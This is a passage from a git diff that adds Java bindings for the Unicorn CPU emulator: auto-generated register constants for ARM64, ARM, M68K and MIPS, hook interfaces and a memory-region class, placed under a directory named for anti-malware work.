UC_ARM64_REG_X4 = 203; + public static final int UC_ARM64_REG_X5 = 204; + public static final int UC_ARM64_REG_X6 = 205; + public static final int UC_ARM64_REG_X7 = 206; + public static final int UC_ARM64_REG_X8 = 207; + public static final int UC_ARM64_REG_X9 = 208; + public static final int UC_ARM64_REG_X10 = 209; + public static final int UC_ARM64_REG_X11 = 210; + public static final int UC_ARM64_REG_X12 = 211; + public static final int UC_ARM64_REG_X13 = 212; + public static final int UC_ARM64_REG_X14 = 213; + public static final int UC_ARM64_REG_X15 = 214; + public static final int UC_ARM64_REG_X16 = 215; + public static final int UC_ARM64_REG_X17 = 216; + public static final int UC_ARM64_REG_X18 = 217; + public static final int UC_ARM64_REG_X19 = 218; + public static final int UC_ARM64_REG_X20 = 219; + public static final int UC_ARM64_REG_X21 = 220; + public static final int UC_ARM64_REG_X22 = 221; + public static final int UC_ARM64_REG_X23 = 222; + public static final int UC_ARM64_REG_X24 = 223; + public static final int UC_ARM64_REG_X25 = 224; + public static final int UC_ARM64_REG_X26 = 225; + public static final int UC_ARM64_REG_X27 = 226; + public static final int UC_ARM64_REG_X28 = 227; + public static final int UC_ARM64_REG_V0 = 228; + public static final int UC_ARM64_REG_V1 = 229; + public static final int UC_ARM64_REG_V2 = 230; + public static final int UC_ARM64_REG_V3 = 231; + public static final int UC_ARM64_REG_V4 = 232; + public static final int UC_ARM64_REG_V5 = 233; + public static final int UC_ARM64_REG_V6 = 234; + public static final int UC_ARM64_REG_V7 = 235; + public static final int UC_ARM64_REG_V8 = 236; + public static final int UC_ARM64_REG_V9 = 237; + public static final int UC_ARM64_REG_V10 = 238; + public static final int UC_ARM64_REG_V11 = 239; + public static final int UC_ARM64_REG_V12 = 240; + public static final int UC_ARM64_REG_V13 = 241; + public static final int UC_ARM64_REG_V14 = 242; + public static final int UC_ARM64_REG_V15 = 243; + public static final int UC_ARM64_REG_V16 = 244; + public static final int UC_ARM64_REG_V17 = 245; + public static final int UC_ARM64_REG_V18 = 246; + public static final int UC_ARM64_REG_V19 = 247; + public static final int UC_ARM64_REG_V20 = 248; + public static final int UC_ARM64_REG_V21 = 249; + public static final int UC_ARM64_REG_V22 = 250; + public static final int UC_ARM64_REG_V23 = 251; + public static final int UC_ARM64_REG_V24 = 252; + public static final int UC_ARM64_REG_V25 = 253; + public static final int UC_ARM64_REG_V26 = 254; + public static final int UC_ARM64_REG_V27 = 255; + public static final int UC_ARM64_REG_V28 = 256; + public static final int UC_ARM64_REG_V29 = 257; + public static final int UC_ARM64_REG_V30 = 258; + public static final int UC_ARM64_REG_V31 = 259; + +// pseudo registers + public static final int UC_ARM64_REG_PC = 260; + public static final int UC_ARM64_REG_CPACR_EL1 = 261; + +// thread registers + public static final int UC_ARM64_REG_TPIDR_EL0 = 262; + public static final int UC_ARM64_REG_TPIDRRO_EL0 = 263; + public static final int UC_ARM64_REG_TPIDR_EL1 = 264; + public static final int UC_ARM64_REG_PSTATE = 265; + +// exception link registers + public static final int UC_ARM64_REG_ELR_EL0 = 266; + public static final int UC_ARM64_REG_ELR_EL1 = 267; + public static final int UC_ARM64_REG_ELR_EL2 = 268; + public static final int UC_ARM64_REG_ELR_EL3 = 269; + +// stack pointers registers + public static final int UC_ARM64_REG_SP_EL0 = 270; + public static final int UC_ARM64_REG_SP_EL1 = 271; + public static final int UC_ARM64_REG_SP_EL2 = 272; + public static final int UC_ARM64_REG_SP_EL3 = 273; + +// other CP15 registers + public static final int UC_ARM64_REG_TTBR0_EL1 = 274; + public static final int UC_ARM64_REG_TTBR1_EL1 = 275; + public static final int UC_ARM64_REG_ESR_EL0 = 276; + public static final int UC_ARM64_REG_ESR_EL1 = 277; + public static final int UC_ARM64_REG_ESR_EL2 = 278; + public static final int UC_ARM64_REG_ESR_EL3 = 279; + public static final int UC_ARM64_REG_FAR_EL0 = 280; + public static final int UC_ARM64_REG_FAR_EL1 = 281; + public static final int UC_ARM64_REG_FAR_EL2 = 282; + public static final int UC_ARM64_REG_FAR_EL3 = 283; + public static final int UC_ARM64_REG_PAR_EL1 = 284; + public static final int UC_ARM64_REG_MAIR_EL1 = 285; + public static final int UC_ARM64_REG_VBAR_EL0 = 286; + public static final int UC_ARM64_REG_VBAR_EL1 = 287; + public static final int UC_ARM64_REG_VBAR_EL2 = 288; + public static final int UC_ARM64_REG_VBAR_EL3 = 289; + public static final int UC_ARM64_REG_ENDING = 290; + +// alias registers + public static final int UC_ARM64_REG_IP0 = 215; + public static final int UC_ARM64_REG_IP1 = 216; + public static final int UC_ARM64_REG_FP = 1; + public static final int UC_ARM64_REG_LR = 2; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java new file mode 100644 index 0000000..0bab07a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ArmConst.java @@ -0,0 +1,138 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface ArmConst { + +// ARM registers + + public static final int UC_ARM_REG_INVALID = 0; + public static final int UC_ARM_REG_APSR = 1; + public static final int UC_ARM_REG_APSR_NZCV = 2; + public static final int UC_ARM_REG_CPSR = 3; + public static final int UC_ARM_REG_FPEXC = 4; + public static final int UC_ARM_REG_FPINST = 5; + public static final int UC_ARM_REG_FPSCR = 6; + public static final int UC_ARM_REG_FPSCR_NZCV = 7; + public static final int UC_ARM_REG_FPSID = 8; + public static final int UC_ARM_REG_ITSTATE = 9; + public static final int UC_ARM_REG_LR = 10; + public static final int UC_ARM_REG_PC = 11; + public static final int UC_ARM_REG_SP = 12; + public static final int UC_ARM_REG_SPSR = 13; + public static final int UC_ARM_REG_D0 = 14; + public static final int UC_ARM_REG_D1 = 15; + public static final int UC_ARM_REG_D2 = 16; + public static final int UC_ARM_REG_D3 = 17; + public static final int UC_ARM_REG_D4 = 18; + public static final int UC_ARM_REG_D5 = 19; + public static final int UC_ARM_REG_D6 = 20; + public static final int UC_ARM_REG_D7 = 21; + public static final int UC_ARM_REG_D8 = 22; + public static final int UC_ARM_REG_D9 = 23; + public static final int UC_ARM_REG_D10 = 24; + public static final int UC_ARM_REG_D11 = 25; + public static final int UC_ARM_REG_D12 = 26; + public static final int UC_ARM_REG_D13 = 27; + public static final int UC_ARM_REG_D14 = 28; + public static final int UC_ARM_REG_D15 = 29; + public static final int UC_ARM_REG_D16 = 30; + public static final int UC_ARM_REG_D17 = 31; + public static final int UC_ARM_REG_D18 = 32; + public static final int UC_ARM_REG_D19 = 33; + public static final int UC_ARM_REG_D20 = 34; + public static final int UC_ARM_REG_D21 = 35; + public static final int UC_ARM_REG_D22 = 36; + public static final int UC_ARM_REG_D23 = 37; + public static final int UC_ARM_REG_D24 = 38; + public static final int UC_ARM_REG_D25 = 39; + public static final int UC_ARM_REG_D26 = 40; + public static final int UC_ARM_REG_D27 = 41; + public static final int UC_ARM_REG_D28 = 42; + public static final int UC_ARM_REG_D29 = 43; + public static final int UC_ARM_REG_D30 = 44; + public static final int UC_ARM_REG_D31 = 45; + public static final int UC_ARM_REG_FPINST2 = 46; + public static final int UC_ARM_REG_MVFR0 = 47; + public static final int UC_ARM_REG_MVFR1 = 48; + public static final int UC_ARM_REG_MVFR2 = 49; + public static final int UC_ARM_REG_Q0 = 50; + public static final int UC_ARM_REG_Q1 = 51; + public static final int UC_ARM_REG_Q2 = 52; + public static final int UC_ARM_REG_Q3 = 53; + public static final int UC_ARM_REG_Q4 = 54; + public static final int UC_ARM_REG_Q5 = 55; + public static final int UC_ARM_REG_Q6 = 56; + public static final int UC_ARM_REG_Q7 = 57; + public static final int UC_ARM_REG_Q8 = 58; + public static final int UC_ARM_REG_Q9 = 59; + public static final int UC_ARM_REG_Q10 = 60; + public static final int UC_ARM_REG_Q11 = 61; + public static final int UC_ARM_REG_Q12 = 62; + public static final int UC_ARM_REG_Q13 = 63; + public static final int UC_ARM_REG_Q14 = 64; + public static final int UC_ARM_REG_Q15 = 65; + public static final int UC_ARM_REG_R0 = 66; + public static final int UC_ARM_REG_R1 = 67; + public static final int UC_ARM_REG_R2 = 68; + public static final int UC_ARM_REG_R3 = 69; + public static final int UC_ARM_REG_R4 = 70; + public static final int UC_ARM_REG_R5 = 71; + public static final int UC_ARM_REG_R6 = 72; + public static final int UC_ARM_REG_R7 = 73; + public static final int UC_ARM_REG_R8 = 74; + public static final int UC_ARM_REG_R9 = 75; + public static final int UC_ARM_REG_R10 = 76; + public static final int UC_ARM_REG_R11 = 77; + public static final int UC_ARM_REG_R12 = 78; + public static final int UC_ARM_REG_S0 = 79; + public static final int UC_ARM_REG_S1 = 80; + public static final int UC_ARM_REG_S2 = 81; + public static final int UC_ARM_REG_S3 = 82; + public static final int UC_ARM_REG_S4 = 83; + public static final int UC_ARM_REG_S5 = 84; + public static final int UC_ARM_REG_S6 = 85; + public static final int UC_ARM_REG_S7 = 86; + public static final int UC_ARM_REG_S8 = 87; + public static final int UC_ARM_REG_S9 = 88; + public static final int UC_ARM_REG_S10 = 89; + public static final int UC_ARM_REG_S11 = 90; + public static final int UC_ARM_REG_S12 = 91; + public static final int UC_ARM_REG_S13 = 92; + public static final int UC_ARM_REG_S14 = 93; + public static final int UC_ARM_REG_S15 = 94; + public static final int UC_ARM_REG_S16 = 95; + public static final int UC_ARM_REG_S17 = 96; + public static final int UC_ARM_REG_S18 = 97; + public static final int UC_ARM_REG_S19 = 98; + public static final int UC_ARM_REG_S20 = 99; + public static final int UC_ARM_REG_S21 = 100; + public static final int UC_ARM_REG_S22 = 101; + public static final int UC_ARM_REG_S23 = 102; + public static final int UC_ARM_REG_S24 = 103; + public static final int UC_ARM_REG_S25 = 104; + public static final int UC_ARM_REG_S26 = 105; + public static final int UC_ARM_REG_S27 = 106; + public static final int UC_ARM_REG_S28 = 107; + public static final int UC_ARM_REG_S29 = 108; + public static final int UC_ARM_REG_S30 = 109; + public static final int UC_ARM_REG_S31 = 110; + public static final int UC_ARM_REG_C1_C0_2 = 111; + public static final int UC_ARM_REG_C13_C0_2 = 112; + public static final int UC_ARM_REG_C13_C0_3 = 113; + public static final int UC_ARM_REG_IPSR = 114; + public static final int UC_ARM_REG_MSP = 115; + public static final int UC_ARM_REG_PSP = 116; + public static final int UC_ARM_REG_CONTROL = 117; + public static final int UC_ARM_REG_ENDING = 118; + +// alias registers + public static final int UC_ARM_REG_R13 = 12; + public static final int UC_ARM_REG_R14 = 10; + public static final int UC_ARM_REG_R15 = 11; + public static final int UC_ARM_REG_SB = 75; + public static final int UC_ARM_REG_SL = 76; + public static final int UC_ARM_REG_FP = 77; + public static final int UC_ARM_REG_IP = 78; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java new file mode 100644 index 0000000..cae5ef9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/BlockHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface BlockHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java new file mode 100644 index 0000000..6cbfdd4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/CodeHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface CodeHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java new file mode 100644 index 0000000..db1f12d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/EventMemHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface EventMemHook extends Hook { + + public boolean hook(Unicorn u, long address, int size, long value, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java new file mode 100644 index 0000000..003599a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Hook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +/** + * Base class for all unicorn hooking interfaces + */ + +public interface Hook { +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java new file mode 100644 index 0000000..97653ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface InHook extends Hook { + + public int hook(Unicorn u, int port, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java new file mode 100644 index 0000000..23bc29f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/InterruptHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface InterruptHook extends Hook { + + public void hook(Unicorn u, int intno, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java new file mode 100644 index 0000000..4f0574d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/M68kConst.java @@ -0,0 +1,30 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface M68kConst { + +// M68K registers + + public static final int UC_M68K_REG_INVALID = 0; + public static final int UC_M68K_REG_A0 = 1; + public static final int UC_M68K_REG_A1 = 2; + public static final int UC_M68K_REG_A2 = 3; + public static final int UC_M68K_REG_A3 = 4; + public static final int UC_M68K_REG_A4 = 5; + public static final int UC_M68K_REG_A5 = 6; + public static final int UC_M68K_REG_A6 = 7; + public static final int UC_M68K_REG_A7 = 8; + public static final int UC_M68K_REG_D0 = 9; + public static final int UC_M68K_REG_D1 = 10; + public static final int UC_M68K_REG_D2 = 11; + public static final int UC_M68K_REG_D3 = 12; + public static final int UC_M68K_REG_D4 = 13; + public static final int UC_M68K_REG_D5 = 14; + public static final int UC_M68K_REG_D6 = 15; + public static final int UC_M68K_REG_D7 = 16; + public static final int UC_M68K_REG_SR = 17; + public static final int UC_M68K_REG_PC = 18; + public static final int UC_M68K_REG_ENDING = 19; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java new file mode 100644 index 0000000..9f1a188 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemHook.java @@ -0,0 +1,27 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface MemHook extends ReadHook,WriteHook { + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java new file mode 100644 index 0000000..b729b3a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MemRegion.java @@ -0,0 +1,37 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public class MemRegion { + + public long begin; + public long end; + public int perms; + + public MemRegion(long begin, long end, int perms) { + this.begin = begin; + this.end = end; + this.perms = perms; + } + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java new file mode 100644 index 0000000..3b2dd99 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/MipsConst.java @@ -0,0 +1,203 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface MipsConst { + +// MIPS registers + + public static final int UC_MIPS_REG_INVALID = 0; + +// General purpose registers + public static final int UC_MIPS_REG_PC = 1; + public static final int UC_MIPS_REG_0 = 2; + public static final int UC_MIPS_REG_1 = 3; + public static final int UC_MIPS_REG_2 = 4; + public static final int UC_MIPS_REG_3 = 5; + public static final int UC_MIPS_REG_4 = 6; + public static final int UC_MIPS_REG_5 = 7; + public static final int UC_MIPS_REG_6 = 8; + public static final int UC_MIPS_REG_7 = 9; + public static final int UC_MIPS_REG_8 = 10; + public static final int UC_MIPS_REG_9 = 11; + public static final int UC_MIPS_REG_10 = 12; + public static final int UC_MIPS_REG_11 = 13; + public static final int UC_MIPS_REG_12 = 14; + public static final int UC_MIPS_REG_13 = 15; + public static final int UC_MIPS_REG_14 = 16; + public static final int UC_MIPS_REG_15 = 17; + public static final int UC_MIPS_REG_16 = 18; + public static final int UC_MIPS_REG_17 = 19; + public static final int UC_MIPS_REG_18 = 20; + public static final int UC_MIPS_REG_19 = 21; + public static final int UC_MIPS_REG_20 = 22; + public static final int UC_MIPS_REG_21 = 23; + public static final int UC_MIPS_REG_22 = 24; + public static final int UC_MIPS_REG_23 = 25; + public static final int UC_MIPS_REG_24 = 26; + public static final int UC_MIPS_REG_25 = 27; + public static final int UC_MIPS_REG_26 = 28; + public static final int UC_MIPS_REG_27 = 29; + public static final int UC_MIPS_REG_28 = 30; + public static final int UC_MIPS_REG_29 = 31; + public static final int UC_MIPS_REG_30 = 32; + public static final int UC_MIPS_REG_31 = 33; + +// DSP registers + public static final int UC_MIPS_REG_DSPCCOND = 34; + public static final int UC_MIPS_REG_DSPCARRY = 35; + public static final int UC_MIPS_REG_DSPEFI = 36; + public static final int UC_MIPS_REG_DSPOUTFLAG = 37; + public static final int UC_MIPS_REG_DSPOUTFLAG16_19 = 38; + public static final int UC_MIPS_REG_DSPOUTFLAG20 = 39; + public static final int UC_MIPS_REG_DSPOUTFLAG21 = 40; + public static final int UC_MIPS_REG_DSPOUTFLAG22 = 41; + public static final int UC_MIPS_REG_DSPOUTFLAG23 = 42; + public static final int UC_MIPS_REG_DSPPOS = 43; + public static final int UC_MIPS_REG_DSPSCOUNT = 44; + +// ACC registers + public static final int UC_MIPS_REG_AC0 = 45; + public static final int UC_MIPS_REG_AC1 = 46; + public static final int UC_MIPS_REG_AC2 = 47; + public static final int UC_MIPS_REG_AC3 = 48; + +// COP registers + public static final int UC_MIPS_REG_CC0 = 49; + public static final int UC_MIPS_REG_CC1 = 50; + public static final int UC_MIPS_REG_CC2 = 51; + public static final int UC_MIPS_REG_CC3 = 52; + public static final int UC_MIPS_REG_CC4 = 53; + public static final int UC_MIPS_REG_CC5 = 54; + public static final int UC_MIPS_REG_CC6 = 55; + public static final int UC_MIPS_REG_CC7 = 56; + +// FPU registers + public static final int UC_MIPS_REG_F0 = 57; + public static final int UC_MIPS_REG_F1 = 58; + public static final int UC_MIPS_REG_F2 = 59; + public static final int UC_MIPS_REG_F3 = 60; + public static final int UC_MIPS_REG_F4 = 61; + public static final int UC_MIPS_REG_F5 = 62; + public static final int UC_MIPS_REG_F6 = 63; + public static final int UC_MIPS_REG_F7 = 64; + public static final int UC_MIPS_REG_F8 = 65; + public static final int UC_MIPS_REG_F9 = 66; + public static final int UC_MIPS_REG_F10 = 67; + public static final int UC_MIPS_REG_F11 = 68; + public static final int UC_MIPS_REG_F12 = 69; + public static final int UC_MIPS_REG_F13 = 70; + public static final int UC_MIPS_REG_F14 = 71; + public static final int UC_MIPS_REG_F15 = 72; + public static final int UC_MIPS_REG_F16 = 73; + public static final int UC_MIPS_REG_F17 = 74; + public static final int UC_MIPS_REG_F18 = 75; + public static final int UC_MIPS_REG_F19 = 76; + public static final int UC_MIPS_REG_F20 = 77; + public static final int UC_MIPS_REG_F21 = 78; + public static final int UC_MIPS_REG_F22 = 79; + public static final int UC_MIPS_REG_F23 = 80; + public static final int UC_MIPS_REG_F24 = 81; + public static final int UC_MIPS_REG_F25 = 82; + public static final int UC_MIPS_REG_F26 = 83; + public static final int UC_MIPS_REG_F27 = 84; + public static final int UC_MIPS_REG_F28 = 85; + public static final int UC_MIPS_REG_F29 = 86; + public static final int UC_MIPS_REG_F30 = 87; + public static final int UC_MIPS_REG_F31 = 88; + public static final int UC_MIPS_REG_FCC0 = 89; + public static final int UC_MIPS_REG_FCC1 = 90; + public static final int UC_MIPS_REG_FCC2 = 91; + public static final int UC_MIPS_REG_FCC3 = 92; + public static final int UC_MIPS_REG_FCC4 = 93; + public static final int UC_MIPS_REG_FCC5 = 94; + public static final int UC_MIPS_REG_FCC6 = 95; + public static final int UC_MIPS_REG_FCC7 = 96; + +// AFPR128 + public static final int UC_MIPS_REG_W0 = 97; + public static final int UC_MIPS_REG_W1 = 98; + public static final int UC_MIPS_REG_W2 = 99; + public static final int UC_MIPS_REG_W3 = 100; + public static final int UC_MIPS_REG_W4 = 101; + public static final int UC_MIPS_REG_W5 = 102; + public static final int UC_MIPS_REG_W6 = 103; + public static final int UC_MIPS_REG_W7 = 104; + public static final int UC_MIPS_REG_W8 = 105; + public static final int UC_MIPS_REG_W9 = 106; + public static final int UC_MIPS_REG_W10 = 107; + public static final int UC_MIPS_REG_W11 = 108; + public static final int UC_MIPS_REG_W12 = 109; + public static final int UC_MIPS_REG_W13 = 110; + public static final int UC_MIPS_REG_W14 = 111; + public static final int UC_MIPS_REG_W15 = 112; + public static final int UC_MIPS_REG_W16 = 113; + public static final int UC_MIPS_REG_W17 = 114; + public static final int UC_MIPS_REG_W18 = 115; + public static final int UC_MIPS_REG_W19 = 116; + public static final int UC_MIPS_REG_W20 = 117; + public static final int UC_MIPS_REG_W21 = 118; + public static final int UC_MIPS_REG_W22 = 119; + public static final int UC_MIPS_REG_W23 = 120; + public static final int UC_MIPS_REG_W24 = 121; + public static final int UC_MIPS_REG_W25 = 122; + public static final int UC_MIPS_REG_W26 = 123; + public static final int UC_MIPS_REG_W27 = 124; + public static final int UC_MIPS_REG_W28 = 125; + public static final int UC_MIPS_REG_W29 = 126; + public static final int UC_MIPS_REG_W30 = 127; + public static final int UC_MIPS_REG_W31 = 128; + public static final int UC_MIPS_REG_HI = 129; + public static final int UC_MIPS_REG_LO = 130; + public static final int UC_MIPS_REG_P0 = 131; + public static final int UC_MIPS_REG_P1 = 132; + public static final int UC_MIPS_REG_P2 = 133; + public static final int UC_MIPS_REG_MPL0 = 134; + public static final int UC_MIPS_REG_MPL1 = 135; + public static final int UC_MIPS_REG_MPL2 = 136; + public static final int UC_MIPS_REG_CP0_CONFIG3 = 137; + public static final int UC_MIPS_REG_CP0_USERLOCAL = 138; + public static final int UC_MIPS_REG_ENDING = 139; + public static final int UC_MIPS_REG_ZERO = 2; + public static final int UC_MIPS_REG_AT = 3; + public static final int UC_MIPS_REG_V0 = 4; + public static final int UC_MIPS_REG_V1 = 5; + public static final int UC_MIPS_REG_A0 = 6; + public static final int UC_MIPS_REG_A1 = 7; + public static final int UC_MIPS_REG_A2 = 8; + public static final int UC_MIPS_REG_A3 = 9; + public static final int UC_MIPS_REG_T0 = 10; + public static final int UC_MIPS_REG_T1 = 11; + public static final int UC_MIPS_REG_T2 = 12; + public static final int UC_MIPS_REG_T3 = 13; + public static final int UC_MIPS_REG_T4 = 14; + public static final int UC_MIPS_REG_T5 = 15; + public static final int UC_MIPS_REG_T6 = 16; + public static final int UC_MIPS_REG_T7 = 17; + public static final int UC_MIPS_REG_S0 = 18; + public static final int UC_MIPS_REG_S1 = 19; + public static final int UC_MIPS_REG_S2 = 20; + public static final int UC_MIPS_REG_S3 = 21; + public static final int UC_MIPS_REG_S4 = 22; + public static final int UC_MIPS_REG_S5 = 23; + public static final int UC_MIPS_REG_S6 = 24; + public static final int UC_MIPS_REG_S7 = 25; + public static final int UC_MIPS_REG_T8 = 26; + public static final int UC_MIPS_REG_T9 = 27; + public static final int UC_MIPS_REG_K0 = 28; + public static final int UC_MIPS_REG_K1 = 29; + public static final int UC_MIPS_REG_GP = 30; + public static final int UC_MIPS_REG_SP = 31; + public static final int UC_MIPS_REG_FP = 32; + public static final int UC_MIPS_REG_S8 = 32; + public static final int UC_MIPS_REG_RA = 33; + public static final int UC_MIPS_REG_HI0 = 45; + public static final int UC_MIPS_REG_HI1 = 46; + public static final int UC_MIPS_REG_HI2 = 47; + public static final int UC_MIPS_REG_HI3 = 48; + public static final int UC_MIPS_REG_LO0 = 45; + public static final int UC_MIPS_REG_LO1 = 46; + public static final int UC_MIPS_REG_LO2 = 47; + public static final int UC_MIPS_REG_LO3 = 48; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java new file mode 100644 index 0000000..94c050f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/OutHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the 